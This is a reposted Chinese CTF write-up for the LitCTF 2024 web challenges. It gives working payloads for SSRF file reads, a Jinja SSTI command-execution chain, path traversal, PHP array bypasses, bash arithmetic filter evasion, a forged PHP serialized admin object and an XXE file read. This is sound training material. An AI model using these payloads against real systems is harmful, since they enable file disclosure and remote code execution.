【Web】LitCTF 2024 题解(全)
目录
SAS - Serializing Authentication
浏览器也能套娃?
随便试一试,一眼ssrf
file:///flag直接读本地文件
一个....池子?
{{7*7}}测出SSTI
随便找个payload打了
{{x.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('tac /f*').read()")}}
高亮主题(划掉)背景查看器
一眼文件包含漏洞
../../../../flag
目录穿越拿到flag
百万美元的诱惑
?a[]=1&b[]=2&c=2025.a
过了php八股
访问./dollar.php
参考ctfshow web57
【Web】CTFSHOW PHP命令执行刷题记录(全)_ctfweb解题 php-CSDN博客
0=$(())
12=$((~$((-13))))
-13=$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))
12=$((~$(($((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))))))
SAS - Serializing Authentication
傻瓜题
<?php
class User {
public $username;
public $password;
}
$user=new User();
$user->username='admin';
$user->password='secure_password';
echo base64_encode(serialize($user));
?>
exx
以xml形式传数据,打xxe
直接读文件
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<user><username>&xxe;</username><password>admin</password></user>
原文地址:https://blog.csdn.net/uuzeray/article/details/140687504
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!